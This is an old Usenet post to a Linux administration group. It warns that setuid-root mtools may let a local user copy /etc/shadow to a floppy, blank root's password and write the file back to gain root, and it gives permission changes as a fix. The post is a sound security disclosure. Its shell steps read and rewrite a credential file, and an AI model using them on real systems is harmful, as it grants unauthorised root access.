by Path: ecs.ox.ac.uk!m91dps
Newsgroups: comp.os.linux.admin
Subject: Possible security hole (software version/setup dependant)
Expires:
References:
Sender:
Followup-To:
Distribution: world
Organization: Oxford University Undergraduate Engineering & Comp Sci Lab, UK
Keywords:
The following security may or may not be present on your system.
If you have your mtools setuid root the following could well be possible
if you have a mess-dos disc in the floppy drive...
cracker% mwrite /etc/shadow A:
cracker% mread A:shadow hehe
cracker% <upload and edit hehe so root has no password>
cracker% <upload diddled /etc/shadow>
cracker% mwrite diddled A:
cracker% mread diddled /etc/shadow
cracker% su root
If this security hole is present on your system try:
chgrp fdisc /dev/fd*
chmod 660 /dev/fd*
chgrp fdisc /usr/bin/<mtools>
chmod g+s a-s /usr/bin/<mtools>
(The presence or absence of this hole is obviously dependant on what version
of the mtools you use and how it is set up).
Duncan (-:
"I'll try it on my system sometime soon... it was just a cute idea I had"
P.S. if you have / as a dos disc and the emulator setuid root make sure that
crackers can't use the dos emulator to give you an alternative version
of things you don't want them to (e.g. /etc/shadow).
X